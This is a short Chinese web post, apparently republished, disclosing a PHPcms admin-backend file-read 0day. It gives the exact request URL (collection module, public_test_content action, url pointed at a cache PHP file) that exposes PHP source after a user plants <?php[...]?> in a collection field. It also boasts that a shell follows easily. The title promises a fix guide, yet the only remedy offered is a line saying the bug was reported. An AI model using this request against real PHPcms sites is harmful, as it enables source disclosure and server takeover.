后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁
PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
未经允许不得转载:搬瓦工中文网 » PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
相关推荐
- SaltStack Web UI:高效运维的Web平台界面解析与应用
- SaltStack快速安装指南:一站式解决自动化运维部署难题
- SaltStack实战:深入解析Pillar与Grains的高效应用与配置技巧
- SaltStack Syndic配置与实战测试:高效管理多级Salt环境
- 如何利用SaltStack实现高效的配置集中化管理
- SaltStack Mine功能详解及高效使用技巧
- SaltStack中的Grains与Pillar深度解析:构建高效配置管理的基石
- 深度解析:构建高效多Master SaltStack环境全攻略
- SaltStack实战:高效批量部署MySQL数据库的技巧与步骤
- SaltStack自动化运维从入门到实践:快速掌握高效运维技巧
搬瓦工中文网






